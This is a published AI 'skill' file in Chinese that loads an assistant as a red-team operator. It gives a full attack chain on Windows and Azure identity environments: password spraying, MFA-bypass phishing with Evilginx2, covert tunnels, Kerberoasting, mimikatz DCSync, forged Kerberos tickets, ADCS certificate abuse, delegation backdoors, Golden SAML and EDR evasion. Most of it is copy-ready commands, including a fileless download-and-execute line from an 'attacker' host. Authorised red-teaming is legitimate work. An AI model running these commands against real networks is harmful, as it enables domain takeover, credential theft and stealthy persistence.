网络渗透测试深度技能(红队攻击链版)

SkillCloud & infra

网络渗透测试/红队攻击链深度专业技能(资深攻防专家版 v3.0):红队攻击链整体规划与MITRE ATT&CK TTP映射、目标建模与决策树、高级外网打点(钓鱼联动/供应链/云资产入口)、隧道代理与C2隐蔽、内网信息收集与BloodHound CE图分析、AD域渗透深化(Kerberoast/DCSync/ADCS ESC1-16/委派滥用/信任关系/混合身份Azure AD)、EDR环境高级横向(LOTL/无文件/内存执行)、权限提升、域控接管与持久化、攻击模拟自动化(Caldera/Atomic Red Team/Sliver)、AI大模型辅助红队作战(路径规划/自动化编排/报告生成)、红队报告与复盘方法论,从信息收集到全域接管完整攻击链

Available today. Use it from your connected AI after setup.

Connect ahel once, and every AI you use reads what you have installed.

Then ask your AI: use the 网络渗透测试深度技能(红队攻击链版) skill

What this skill tells your AI

The instructions your AI receives, as published by langbyyi/cyberstrikeai-src in skills/network-penetration-testing/SKILL.md and read by ahel’s review.

AI LOAD INSTRUCTION: 红队网络渗透全流程专家打法。聚焦攻击链规划与 TTP 映射→外网打点→隧道→内网横向→EDR 对抗→域控接管的阶段决策;细分漏洞面交给对应细分 skill,报告对齐 pentest-output-standards。

概述

网络渗透与红队对抗是攻防演练的核心战场。本技能站在资深攻防专家/红队队长视角,系统化覆盖红队攻击链整体规划→高级外网打点→隧道代理→内网信息收集→AD域渗透→权限提升→域控接管→持久化→报告复盘完整攻击链,并融入 2025-2026 年最新攻击技术情报(ADCS ESC1-ESC16 全谱、Certighost CVE-2026-54121、NTLM Reflection 新原语 CVE-2025-33073、BloodHound CE v8 OpenGraph、混合身份 Golden SAML、AI 自主渗透平台等)。

intranet-penetration-testing 技能(内网阶段高频实操细节:本地信息收集、凭证窃取、隐藏隧道、提权矩阵、免杀C2)互补定位:本技能负责全局攻击链规划、高级对抗维度与攻防方法论(TTP 映射、目标建模、高级打点、EDR 横向、AD 高级攻击、攻击模拟自动化、AI 结合、报告复盘);内网实操的"颗粒度细节"见 intranet-penetration-testing,两技能配合可覆盖从外网资产到域控接管的完整闭环。

核心概念

  • 攻击链(Kill Chain):侦察→打点→立足→隧道→横向→提权→域控→持久化,非线性、可迭代的网状过程
  • Tier 0 资产:域控、ADFS、Entra Connect、CA(证书服务器)、备份系统等"控制一切"的资产,是红队最高优先级目标
  • Assume Breach:以"已被攻破"为前提设计攻击路径,内网阶段从"标准域用户被攻破"起步
  • TTP(MITRE ATT&CK):战术/技术/过程的标准语言,红队用它规划路径、蓝队用它检测响应
  • OPSEC:作战安全——减少触警面(低噪音优先被动技术,再主动技术)
  • BloodHound 图论:把 AD 提权抽象为图遍历问题,路径 = 从"已拥有节点"到"Tier 0 节点"的可达边
  • 混合身份(Hybrid Identity):本地 AD 与 Azure AD/Entra ID 通过 Entra Connect/ADFS 联动,信任继承使"本地域管=云端主钥匙"

一、红队攻击链整体规划与 TTP 映射

1.1 完整攻击链总览

Phase 0  目标建模与情报准备     → 资产梳理、Tier 0 识别、决策树
Phase 1  高级外网打点           → Web/VPN/邮件/钓鱼联动/供应链/云资产
Phase 2  隧道代理与 C2          → SOCKS5/HTTP/DNS/ICMP 隧道、流量隐蔽
Phase 3  内网信息收集           → 存活/端口/服务/AD 枚举/BloodHound 图分析
Phase 4  凭据获取               → Kerberoast/AS-REP/内存提取/DCSync/网络抓取
Phase 5  横向移动               → PTH/PTT/WMI/WinRM/DCOM/SMB/EDR 对抗
Phase 6  权限提升               → 本地提权/域内提权/ADCS/ACL 滥用
Phase 7  域控接管               → DCSync → 黄金票据/白银票据/证书伪造
Phase 8  持久化                 → ACL 后门/DCShadow/黄金证书/混合身份后门
Phase 9  报告复盘               → 攻击链复现/证据链/TTP 映射/检测规则输出

1.2 目标建模与攻击路径决策树

资产价值分级(决定攻击优先级):

等级资产类型攻击价值
Tier 0域控、ADFS、Entra Connect、CA、备份、密码管理器拿到即全域接管
Tier 1域管理员/服务器管理员账户、特权工作站通向 Tier 0 的桥
Tier 2服务器、数据库、应用管理员扩大横向面
低值普通工作站、普通用户攻击链起点/跳板

决策树(拿到一个立足点后):

立足点 → 本地管理员? ──否──→ 本地提权(内核/服务/Token)
        └──是──→ 能访问域控? ──否──→ 域枚举 → BloodHound 找路径
                          └──是──→ DCSync 一步到位
内网可达 ADCS? ──是──→ Certipy 审计 ESC1-ESC16
内网可达 ADFS/Entra Connect? ──是──→ 证书提取/Golden SAML/同步账户滥用
域间有信任? ──是──→ 信任攻击(SID History/跨域枚举)

1.3 MITRE ATT&CK TTP 映射表

攻击阶段战术(Tactic)代表性技术(Technique)
情报收集TA0043 侦察T1595 主动扫描 / T1596 公开数据
外网打点TA0001 初始访问T1190 利用暴露应用 / T1566 钓鱼
隧道 C2TA0011 命令与控制T1572 协议隧道 / T1090 代理
内网收集TA0007 发现T1018 远程系统发现 / T1087 账户发现
凭据获取TA0006 凭证访问T1558.003 Kerberoast / T1003.006 DCSync
横向移动TA0008 横向移动T1021.001 SMB-WinRM / T1550.002 PTH
权限提升TA0004 权限提升T1134 Token 操纵 / 域内提权
持久化TA0003 持久化T1098 账户操作 / T1556.001 Skeleton Key
防御绕过TA0005 防御绕过T1055 进程注入 / T1036 伪装

实战价值:用 ATT&CK 编号写报告(如 T1558.003 Kerberoasting),蓝队可直接对照检测规则;红队可据此设计"低检测覆盖面"路径。

1.4 红队战役设计要素

  • RoE(交战规则):明确授权范围、禁打资产、允许时间窗口、破坏性操作边界、应急止损联系人
  • 场景定义:从外部攻破 / 从内部模拟 / 双场景混合;是否模拟特定 APT 的 TTP
  • OPSEC 基线:操作者日志留痕、禁用未授权动作、每次横向后自查触警情况
  • 时间管理:侦察与利用分离、高峰时段通信降低检测概率、关键动作前做影响评估

1.5 与 intranet-penetration-testing 技能的分工

  • 本技能:端到端攻击链规划 + 高级维度(本文件)
  • intranet-penetration-testing:内网阶段实操颗粒度(本地信息收集命令矩阵、mimikatz 细节、隐藏隧道搭建、提权矩阵、免杀 C2、内网 AI 资产攻击面 Ollama/vLLM/RAG/MCP)
  • 建议用法:攻防演练中"全局规划"参照本技能,"进入内网后的每一步操作细节"参照 intranet 技能,本章 3.2/五~九 与 intranet 章节互见

二、高级外网打点

2.1 攻击面测绘(四层法)

Layer 1: 域名/IP资产
  subfinder -d corp.com -all -o subs.txt
  amass enum -passive -d corp.com
  masscan -p1-65535 --rate 10000 -iL ip.txt -oL ports.txt
  nmap -sV -sC -p $(cat ports.txt | tr ',' ' ') -iL ip.txt -oA scan

Layer 2: 证书透明日志(找隐藏子域/入口)
  curl -s "https://crt.sh/?q=%25.corp.com&output=json" | jq -r '.[].name_value' | sort -u
  # owa/adfs/mail/webmail/vpn/rdweb/citrix/sslvpn 等关键词优先

Layer 3: 互联网测绘(Shodan/Censys/Fofa)
  shodan search "ssl.cert.subject.cn:corp.com" --fields ip_str,port,org
  shodan search "http.title:login country:CN org:'corp'"
  # 找暴露的 OWA/ADFS/Exchange/VPN/RDP/数据库

Layer 4: 组织情报(钓鱼准备+口令猜测语料)
  theHarvester -d corp.com -b all
  # Hunter.io/snov.io:企业邮箱格式 (名.姓@corp.com)
  # 招聘网站:技术栈推断(Java/PHP/.NET → 对应漏洞面)
  # dehashed/haveibeenpwned:历史泄露凭据(拼凑弱口令字典)

2.2 常见外网入口利用深化

入口攻击向量要点
Web 应用SQLi/RCE/SSRF/文件上传/反序列化参考 sql-injection-testing/fastjson-exploitation 等专项技能
VPN(SSL VPN/Fortinet/Pulse)历史 RCE、默认口令、会话固定关注厂商 CVE 公告,2024-2026 多家 VPN 出过高危 RCE
邮件系统 OWA/ECP口令喷洒、Exchange RCE 链喷洒注意锁定策略,慢速低并发
ADFS/RDWeb口令喷洒、ADFS 配置滥用/adfs/ls/idpinitiatedsignon 页面常被遗忘暴露
RDP/VNC/SSH弱口令、协议漏洞Hydra 慢速爆破,配合 Honeypot 感知
远程运维软件向日葵/Todesk/AnyDesk默认密码、设备码爆破、历史漏洞
云资产OSS 桶/S3 未授权、云凭证泄露、托管控制台见 2.4 节

口令喷洒模板(低噪音):

# 单用户单密码慢速轮询,避免锁定
crackmapexec smb vpn.corp.com -u users.txt -p 'Corp@2026!' --continue-on-success
# OWA 喷洒(模块化)
ruler --domain corp.com brute --users users.txt --passwords pass.txt --delay 30

2.3 钓鱼联动(红队标准入口)

准备阶段: 仿冒域名+SSL 证书(Typosquatting)、邮箱伪造 SPF/DKIM 检查
投递阶段: GoPhish 批量投递 / 宏文档 / OneNote / ISO 附件 / 恶意 LNK(注意 CVE-2026-32202 类 LNK 触发面)
捕获阶段: Evilginx2 中间人(MFA 绕过,代理真实登录流程)
联动阶段: 捕获的凭据/会话 → 直接作为内网阶段起点(Assume Breach)
# Evilginx2 反代仿冒登录页(捕获 OTP/会话 Cookie)
# config: phishlet 定义仿冒站点, lures 生成钓鱼链接
evilginx2 -p phishlets/ -c config.yaml

关键:钓鱼捕获的会话 Cookie/Token(而非仅密码)是进入内网的最强钥匙;捕获的邮箱可继续作为内网横向的信息源(读邮件找 VPN 账号、资产清单、密码重置流程)。

2.4 供应链与云资产入口

  • 供应链:目标供应商/外包商泄露源码(GitHub 搜索 corp.com 关键代码/密钥)、第三方组件仓库投毒(npm/PyPI 依赖混淆)、外包系统成为跳板
  • 云资产
    # 云存储桶枚举(OSS/S3 未授权读写 → WebShell/泄露文件)
    cloud_enum -k corp.com --disable-aws
    # 云凭证泄露(Github 搜索)
    trufflehog github --org=corp --only-verified
    # 托管数据库/Redis/ES 未授权(云上常见)
    
  • GitHub 泄露扫描gitdorker/trufflehogcorp 相关仓库中的 API Key、corp.com 内部域名、.env、VPN 配置
  • 历史漏洞利用思路:OA/ERP/门户系统(泛微/致远/用友/蓝凌等)历史 RCE 批量检测,与 spring-exploitation/shiro-exploitation/log4shell-exploitation 专项技能联动

2.5 打点后的第一滴血(Foothold Checklist)

# 1. 回连验证(确认出网能力与方向)
curl -x http://127.0.0.1:8080 http://attacker:8000/ping  # 经代理验证
# 2. 权限基线(whoami/systeminfo/网络位置)
whoami; systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
ipconfig /all; route print; arp -a
# 3. 判断是否入域(决定后续走域渗透 or 本机深耕)
echo %USERDOMAIN% | findstr /V %COMPUTERNAME%
# 4. 落地隧道(参考第三章)建立持久可控通道
# 5. 同步触发 intranet-penetration-testing 技能的本地信息收集清单

三、隧道与代理

3.1 隧道技术矩阵

技术工具场景检测难度
SOCKS5 代理frp/Chisel/rpivot/ligolo-ng通用 TCP 代理
HTTP 代理Neo-reGeorg/Tunna/regresshWebShell 代理
ICMP 隧道ptunnel/icmpsh严格防火墙低(少见)
DNS 隧道dnscat2/iodine仅 DNS 出口低(特征明显)
SSH 隧道ssh -D/-L/-R有 SSH 访问
多级代理frpc→frps→proxychains多层内网
WebSocketChisel over WSSWAF 穿透
HTTP/3、QUICquic 隧道高级出口过滤
C2 自带隧道Cobalt Strike/Sliver pivot与 C2 一体化

3.2 隧道搭建流程(frp / Chisel / SSH)

# frp(稳定高效)
# 服务端 frps.ini
[common]
bind_port = 7000
token = password
# 客户端 frpc.ini
[common]
server_addr = vps_ip
server_port = 7000
token = password
[socks5]
type = tcp
remote_port = 6000
plugin = socks5

# Chisel(单二进制,轻量,推荐内网)
# 服务端(VPS)
chisel server --port 8080 --reverse
# 客户端(内网靶机)
chisel client vps:8080 R:socks
# 可加 --fingerprint 双向校验防止中间人

# SSH 动态转发
ssh -D 1080 -N -f user@target       # 本地 SOCKS5
ssh -R 7000:127.0.0.1:7000 user@vps # 反向隧道(出网受限时)

# proxychains 使用
# /etc/proxychains4.conf
socks5 127.0.0.1 6000
proxychains nmap -sT -Pn 10.0.0.0/24

3.3 高级隧道与防火墙穿透

- 端口复用:利用已开放的 80/443 端口做隧道(frp tcp_mux / http_proxy 插件)
- 协议封装:SOCKS 封装在 HTTP/WebSocket/DNS/ICMP 中
- 域前置(Domain Fronting):利用 CDN 白名单域名隐藏 C2 真实目标
- CDN/云函数反代:C2 流量经云函数/CDN 转发,隐藏 VPS 真实 IP
- 时间策略:业务高峰时段通信,流量隐藏在大量正常请求中
- 流量伪装:TLS 指纹(JA3)伪装成 Chrome/Edge、Header 注入噪声(参考 intranet 技能 C2 章节)

3.4 代理链与路由规划

# 多级代理:A(打点机) → B(跳板) → C(目标网段)
# 每一级分别起 frp/chisel socks,proxychains 指向上一级
# 动态路由建议
proxychains4 -q nmap -sT -Pn -p 445,3389,5985 --top-ports 20 172.16.0.0/24
# 按网段分批扫描避免全量 ICMP 惊动 IDS

3.5 隧道 OPSEC

  • 隧道进程改名/伪装成系统服务(--service 安装、进程注入白名单进程)
  • 加密所有隧道流量(TLS/SSH),避免明文 SOCKS 被蓝队抓包分析
  • 单一隧道端口绑定固定源 IP,必要时做限速(避免大流量扫描特征)
  • 关键跳板机保持"原生状态",工具用后即删(内存加载优先)

四、内网信息收集

4.1 内网探测(经代理)

# 存活主机发现(分段,先高频端口后全量)
proxychains nmap -sn 10.0.0.0/24
proxychains nmap -sT -Pn -p 22,80,443,445,88,389,636,1433,3306,3389,6379,5985 10.0.0.0/24
# RustScan 快速全端口 + 定向 nmap 服务识别
rustscan -a 10.0.0.0/24 -b 2000 -- -sV

# 服务识别
proxychains nmap -sT -Pn -sV -p 88,389,445,636 10.0.0.1
# 域控识别特征:88(Kerberos)+389(LDAP)+636(LDAPS)+3268(GC) 同时开放
# 发现域控后先做"域内账号可控性"测试,而非直接爆破

4.2 内网关键服务攻击面

端口服务攻击方向
88Kerberos票据攻击/ASREPRoast/Kerberoast
389/636LDAP/LDAPS域信息枚举/LDAP 注入
445SMBSMB Relay/共享枚举/永恒之蓝类
135RPCDCOM/端口映射/认证胁迫
5985/5986WinRMPowerShell Remoting
3389RDP弱口令/RDP 劫持
1433MSSQLxp_cmdshell/链接服务器/代理凭据
3306MySQL弱口令/提权 UDF
6379Redis未授权/主从复制 RCE
27017MongoDB未授权访问
8443K8s API未授权/K8s 渗透
8006Proxmox/虚拟化管理面接管
21/22/873FTP/SSH/rsync弱口令/匿名/镜像泄露

4.3 BloodHound 图分析与攻击路径(CE v8)

部署与采集:

# BloodHound CE v8(SpecterOps,2025 年后 Legacy 弃用,Kali 2025.3+ 自带)
docker compose up -d                              # 官方 docker-compose 方式
# 域内 Windows 主机上运行采集器
SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\temp\
# Linux 端采集(可选)
bloodhound-python -u user -p pass -d corp.local -ns 10.0.0.1 --zip

# 导入 zip/json 后内置查询
# - Shortest Paths to Domain Admins from Owned Principals
# - Find Principals with DCSync Rights
# - Find Computers where Domain Users are Local Admin
# - Find All Paths from Kerberoastable Users

核心 Cypher 查询(红队常用):

// 从已拥有用户到域管的最短路径
MATCH p=shortestPath((n)-[r*1..]->(m:Group))
WHERE n.name =~ 'USER.*' AND m.name =~ 'DOMAIN ADMINS.*' RETURN p
// 拥有 DCSync 权限的主体
MATCH p=(m)-[:GenericAll|WriteDacl|WriteOwner*1..]->(dc:Domain)
WHERE dc.objectid =~ 'S-1-5-21.*' AND NOT m.objectid =~ 'S-1-5-21.*-512' RETURN p
// 可达非约束委派主机
MATCH p=(n)-[r:AdminTo|GenericAll*1..]->(c:Computer)
WHERE c.unconstraineddelegation = true RETURN p
// 高价值 ACL 滥用点(GenericWrite/GenericAll 于特权组)
MATCH p=(n)-[:GenericWrite|GenericAll|WriteDacl|WriteOwner]->(g:Group)
WHERE g.name =~ 'DOMAIN ADMINS.*|ENTERPRISE.*' RETURN p

图分析实战心法:

- 标记 owned 节点后重新计算路径 → 每次新凭据都刷新分析
- 路径优先级:ADCS > 委派 > ACL > 常规成员关系(ADCS 路径往往一步到域管)
- 优先验证"低成本高收益"路径:可离线破解(Kerberoast)> 需要触发认证(Coercion+Relay)> 需要写 ACL
- BloodHound CE v8 OpenGraph:可扩展到 GitHub/Jamf/Okta/Snowflake,混合身份路径需重点关注(见 6.6)

五、AD 域渗透基础攻击

5.1 Kerberos 攻击详解

# AS-REP Roasting(无需密码的账户,T1558.004)
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -format hashcat -outputfile asrep.hashes
hashcat -m 18200 asrep.hashes wordlist.txt

# Kerberoasting(SPN 关联账户,T1558.003——2026 年最高频技术)
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -outputfile spn.hashes
# 或用 Rubeus(域内主机)
Rubeus.exe kerberoast /outfile:spn.hashes
hashcat -m 13100 spn.hashes wordlist.txt

# 黄金票据(需要 krbtgt Hash,T1558.001)
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local

# 白银票据(需要目标服务 Hash,T1558.002)
impacket-ticketer -nthash SERVICE_HASH -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/dc.corp.local user
# 白银票据只伪造单个服务(如 cifs/spn/ldap),隐蔽性更好

# 委派攻击(非约束/约束/RBCD,T1558.002 变体)见 6.2

检测提示(防御视角):Kerberoasting 最高信号是 Event ID 4769 携带 RC4 加密类型(0x17);AS-REP Roasting 对应 4768。红队可在报告阶段据此输出检测建议。

5.2 NTLM 攻击与投毒

# LLMNR/NBT-NS/mDNS 投毒(Responder)
responder -I eth0 -dwPv
# IPv6 投毒(mitm6,DNSSEC 环境绕过 LLMNR 关闭场景)
mitm6 -d corp.local
# Inveigh(PowerShell 版,无文件落地)
Invoke-Inveigh -NBNS Y -LLMNR Y -HTTP Y -SMB Y

# SMB Relay(投毒捕获的认证转发到目标,T1557)
# 前提:目标关闭 SMB 签名,且捕获账户具备高权限
ntlmrelayx.py -t smb://10.0.0.5 -smb2support -i    # 交互式 shell
ntlmrelayx.py -t ldap://10.0.0.1 --delegate-access  # 配置 RBCD 后门
# 经典组合:Responder 关 SMB/HTTP + ntlmrelayx

5.3 凭证访问与内存提取

# mimikatz(域内主机,T1003.001/002)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:corp.local /all /csv  # 全量(最后一步)
# pypykatz(Linux 端离线解析 LSASS dump)
pypykatz lsa minidump lsass.dmp

# 免杀取 LSASS(EDR 环境替代 mimikatz 进程内操作,详见第七章)
procdump64.exe -ma lsass.exe lsass.dmp     # 利用签名工具(T1003.001 变体)
# Rubeus dump(票据导出用于 PTT)
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

5.4 横向移动基础(详见第七章 EDR 对抗深化)

# PTH(Pass The Hash,T1550.002)
proxychains impacket-psexec -hashes :NT_HASH corp.local/user@10.0.0.5
crackmapexec smb 10.0.0.0/24 -u user -H NT_HASH --exec-method smbexec

# PTT(Pass The Ticket,T1550.003)
export KRB5CCNAME=/tmp/ticket.ccache
proxychains impacket-wmiexec -k -no-pass corp.local/user@10.0.0.5

# WMI / WinRM / DCOM / SCP
proxychains impacket-wmiexec corp.local/user:pass@10.0.0.5
proxychains evil-winrm -i 10.0.0.5 -u user -H NT_HASH
proxychains impacket-dcomexec -hashes :NT_HASH corp.local/user@10.0.0.5

# 批量横向(crackmapexec/netexec)
crackmapexec smb 10.0.0.0/24 -u user -H hash --exec-method wmiexec -x 'whoami'

六、AD 高级攻击深化

6.1 ADCS 证书服务攻击全谱(ESC1-ESC16)

ADCS 是 2024-2026 年最高产的域提权面:83% 的 AD 渗透在数小时到 Domain Admin,ADCS 路径常常一步到位且绕过口令爆破。

# Certipy 5.1.0(支持 ESC1-ESC16 全谱检测与利用)
certipy find -u user@corp.local -p pass -dc-ip 10.0.0.1 -vulnerable -stdout
# 常见漏洞模板:
# ESC1: 客户端认证 + 请求者可指定 SAN
# ESC2: Any Purpose 模板(可伪造任意用途证书)
# ESC3: 代理注册 + 注册代理模板组合
# ESC4: 低权限可写模板 ACL → 改模板再利用 ESC1
# ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 标志开启
# ESC8: NTLM Relay 到 CA 的 HTTP 注册端点(certfnsh.asp)
# ESC9/ESC10: 强认证与 NTAuth 相关(需配合客户端认证绕过)
# ESC13: 模板中嵌入 CA 证书模板可指定组(组内用户可申请)
# ESC14: 证书映射攻击(同名 SAN 映射)
# ESC15: 弱加密签名等
# ESC16: 新的证书映射绕过面

# ESC1 利用(以域管身份申请证书)
certipy req -u user@corp.local -p pass -target 10.0.0.1 -ca 'CORP-CA' \
  -template 'VulnTemplate' -upn 'administrator@corp.local' -out admin.pfx
# 用证书做 PKINIT 认证(无需域管密码)
certipy auth -pfx admin.pfx -dc-ip 10.0.0.1 -domain corp.local
# 输出 NTLM hash 后 PTH → DCSync

# ESC8:NTLM Relay 到 ADCS HTTP 注册端点(配合 Coercer 触发 DC 认证)
ntlmrelayx.py -t http://10.0.0.1/certsrv/certfnsh.asp -smb2support --adcs \
  --template 'DomainController'
coercer coerce -u user -p pass -t 10.0.0.1 -l 10.0.0.50   # 胁迫 DC 向攻击机认证

Certighost(CVE-2026-54121)——2026-07 新增 ADCS 高危

  • 类型:ADCS enrollment chase 回退缺陷,与模板配置无关(默认 Machine 模板 + 企业 CA 即可)
  • 影响:低权限域用户诱导 CA 为任意域控制器签发身份证书 → PKINIT 冒充 DC → DCSync → Golden Ticket 全域接管
  • CVSS 8.8,微软 2026-07-14 补丁,2026-07-24 公开 PoC(GitHub: aniqfakhrul/CVE-2026-54121)
  • 意义:打破"模板合规即安全"的防御思维定式;审计 CA 需同时检查补丁状态与历史证书请求中的 chase 属性

6.2 委派滥用(非约束/约束/RBCD)

# 非约束委派(Unconstrained Delegation)——持有用户的 TGT 可长期窃用
# 发现:BloodHound 查 unconstraineddelegation 或
ldapsearch -x -H ldap://10.0.0.1 -b "DC=corp,DC=local" \
  "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" sAMAccountName
# 利用:Rubeus monitor 等待高权限用户访问 → 抓取 TGT(诱骗访问:SpoolSample/PetitPotam 胁迫 DC 认证到委派主机)
Rubeus.exe monitor /interval:5 /nowrap
SpoolSample.exe 10.0.0.1 <delegation-host>   # 胁迫 DC 向委派主机认证

# 约束委派(Constrained Delegation)——可伪造指定服务的 TGS
Rubeus.exe s4u /user:svc_web /rc4:HASH /impersonateuser:administrator \
  /msdsspn:cifs/dc.corp.local /ptt

# 基于资源的约束委派(RBCD,T1558.002 变体)——控制目标机器账户即可
# 前提:对目标计算机有 GenericWrite 或已控机器账户
impacket-addcomputer corp.local/user:pass -computer-name 'evil$' \
  -computer-pass 'EvilPass123' -dc-ip 10.0.0.1
impacket-rbcd -delegate-to 'dc.corp.local' -delegate-from 'evil$' \
  corp.local/user:pass -action write -dc-ip 10.0.0.1
Rubeus.exe s4u /user:evil$ /rc4:HASH /impersonateuser:administrator /msdsspn:host/dc.corp.local /ptt
impacket-psexec -k -no-pass corp.local/administrator@dc.corp.local

6.3 信任关系攻击

# 域/林信任枚举
nltest /domain_trusts /all_trusts
impacket-getTGT corp.local/user:pass -dc-ip 10.0.0.1
# 跨域/跨林横向(用当前域 TGT 访问对方域资源)
impacket-psexec -k -no-pass corp.local/user@dc.child.corp.local
# SID History 注入(跨域提权,需域管权限)
mimikatz # kerberos::golden /user:evil /domain:corp.local /sid:S-1-5-21-xxx \
           /sids:S-1-5-21-yyy-512 /krbtgt:HASH /ptt   # 注入对方域 Domain Admins SID
# 利用信任:子域域管(非企业域管)通过 SID History 提权到父域
# 林间信任 + 认证服务路径(CVE-2022-33679、SID History 变体等)持续跟进

6.4 ACL 滥用(BloodHound 定位的精细化攻击)

ACL 权限滥用效果工具
GenericAll/GenericWrite(对象)重置密码/添加 SPN/写属性PowerView/impacket
WriteDACL/WriteOwner改写对象 ACL → 自我授权BloodyAD
ForceChangePassword直接改目标密码PowerView Set-DomainUserPassword
AddMember(组)把自己加入特权组PowerView Add-DomainGroupMember
GenericWrite(计算机)配置 RBCD 后门见 6.2
# PowerView 重置目标密码(GenericAll on user)
Set-DomainUserPassword -Identity target_user -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
# BloodyAD(Linux 端 ACL 滥用,无需域内主机)
bloodyAD --host 10.0.0.1 -d corp.local -u user -p pass add genericAll target_user
bloodyAD --host 10.0.0.1 -d corp.local -u user -p pass set password target_user NewPass123!

6.5 认证胁迫与 NTLM Relay 新原语(2025-2026 情报)

认证胁迫(Coercion)——让高权限主机主动向攻击机认证:

# PetitPotam / PrinterBug / DFSCoerce / Coercer(统一化框架)
coercer coerce -u user -p pass -t 10.0.0.1 -l 10.0.0.50 --listener 10.0.0.50

2025-2026 NTLM 攻击演进(重要更新):

  • CVE-2025-33073(NTLM Reflection):反射攻击绕过 SMB 签名限制的新原语,2026 年研究持续产出新利用面;2026-01 Depth Security 的 Impacket fork 剥离 NTLMSSP SIGN/SEAL 标志同时保留 MIC,把 Reflection 扩展到 LDAP/LDAPS 及部分 RPC(任务计划器)
  • CVE-2025-24054.library-ms 恶意文件夹触发 NTLM Hash 泄露,已入 CISA KEV(2025-03)
  • CVE-2025-54918:胁迫+中继组合,篡改 NTLM 消息字段绕过 LDAP 签名与通道绑定
  • CVE-2026-32202:LNK 文件零点击认证胁迫(APT28 零日的不完整补丁,Akamai 2026-04 披露)
  • 微软 NTLM 淘汰时间线:2026-10 自动阻断 NTLMv1 SSO;NTLMv2 仅标记 deprecated——红队需将 NTLM 利用视为"时效窗口",同时把 Kerberos 与证书攻击作为主路径

6.6 混合身份攻击(本地 AD ↔ Azure AD/Entra ID)

混合身份是 2025-2026 年 APT 从本地打到云的主路径(约 65% 初始访问是身份驱动而非恶意软件驱动):

Stage 1  打点本地:Kerberoast/NTLM Relay/ADFS 代理 → 拿到 ADFS 服务账户或域管
Stage 2  提取签名密钥:ADFSDump(提取加密 PFX)+ DKM 密钥(AD 中解密)
Stage 3  伪造令牌:ADFSpoof / shimit 离线伪造任意用户的 SAML 断言(Golden SAML)
Stage 4  云端行动:加联邦域/OAuth 应用授权/后门 Service Principal/Graph API 窃取

Entra Connect 同步攻击(高价值单点):

# AADInternals 套件
Install-Module AADInternals
Get-AADIntTenantID -Domain corp.com            # tenant 侦察(无需凭据)
# 渗透 Entra Connect 服务器(通常 Domain Admin 权限)→
Get-ADIntPassword  msDS-ManagedPassword         # 提取同步账户(MSOL_)明文密码
# 用 MSOL_ 账户做云端 DCSync 式操作 / 重置云端用户密码(2025-09 微软披露真实攻击:非人类同步身份+全局管理员无 MFA → 重置密码→同步回云端)
# PTA Agent 后门:注入 DLL Hook LogonUserW(PTASpy)→ 记录全部云端登录口令
# Seamless SSO 漂移:改 azureADSSO 账户密码 → 云端登录降级

其他混合身份面:

  • Golden SAML(T1606.002):拿 ADFS token-signing 私钥 → 伪造任意用户 SAML → 绕过密码/MFA,密码重置无效
  • Silver SAML:伪造特定服务(如 O365)的 SAML
  • OAuth 应用授权滥用:诱管理员授权恶意应用 → 用应用权限读邮箱/Graph
  • Storm-0558 教训:IdP 私钥泄露 → 任意 token 伪造;红队报告应提醒云侧签名密钥的防护
  • 云侧横向:本地域管 → Entra Connect → 云端全局管理员(Azure MFA 强制 Phase 2 2025-10 后注意服务主体/工作负载身份不受影响,仍是攻击面)

七、EDR 环境下的高级横向移动

7.1 EDR 检测机制认知(对抗前提)

现代 EDR:行为分析 + 内核遥测(ETW)+ 用户态 hook + AI 模型,不止签名
关键被监测点:进程创建(4688/AMSI)、LSASS 访问、内存注入、PowerShell 脚本块、
  WMI/计划任务远程执行、新服务、网络外联特征、命令行参数特征

数据点:CrowdStrike 2024 年 79% 检出是 malware-free(合法凭据 + LOTL + RMM 工具),Bitdefender 分析 84% 高危攻击使用 Living off the Land——EDR 环境下"无文件/无恶意软件横向"是主流

7.2 LOTL 无文件横向(不落盘、不加载恶意二进制)

# 1. PowerShell Remoting(WinRM,域内默认开启)
$cred = New-Object PSCredential('user',(ConvertTo-SecureString 'pass' -AsPlainText -Force))
Invoke-Command -ComputerName 10.0.0.5 -Credential $cred -ScriptBlock { whoami; ipconfig }
# 内存加载执行(无文件):IEX (New-Object Net.WebClient).DownloadString('http://attacker/p.ps1')

# 2. WMI(远程执行,无文件)
wmic /node:10.0.0.5 /user:corp.local\user /password:pass process call create "cmd /c calc"

# 3. DCOM(利用 MMC 等 COM 对象)
impacket-dcomexec corp.local/user:pass@10.0.0.5

# 4. 计划任务远程注册
schtasks /create /s 10.0.0.5 /u corp.local\user /p pass /tn back /tr "cmd /c whoami" /sc once /st 00:00
schtasks /run /s 10.0.0.5 /tn back

# 5. 服务远程创建(sc.exe,LOTL)
sc \\10.0.0.5 create back binPath= "cmd /c whoami"
sc \\10.0.0.5 start back

# 6. SMB 执行(PsExec 协议、impacket-smbexec)
impacket-smbexec corp.local/user:pass@10.0.0.5

7.3 免杀与内存执行(横向载荷落地时)

- Reflective DLL Loading:内存自加载 DLL,绕过 LoadLibrary hook
- APC 注入 / Thread Hijacking:注入合法进程(svchost/explorer)
- 直接系统调用(Direct Syscalls):绕过用户态 EDR hook
- Sleep 混淆 + PE Header Stomping:规避内存扫描
- 白名单进程链(LOLBIN):mshta/rundll32/certutil/msiexec/regsvr32 加载
- AMSI/ETW patch:解除 PowerShell 监控(注意版本差异与 EDR 反制)
- 混淆:XOR/AES 载荷 + 运行时解密;字符串拆分防命令行检测

免杀细节(DLL 注入、syscall、sleep 混淆具体命令)见 intranet-penetration-testing 技能"免杀与 C2"章节。

7.4 横向移动的 OPSEC 与检测对抗

  • 时间差:横向动作放在业务时段,与批量任务天然混合
  • 凭证轮换:一次横向后更换所用凭据(防中途被截获后反制)
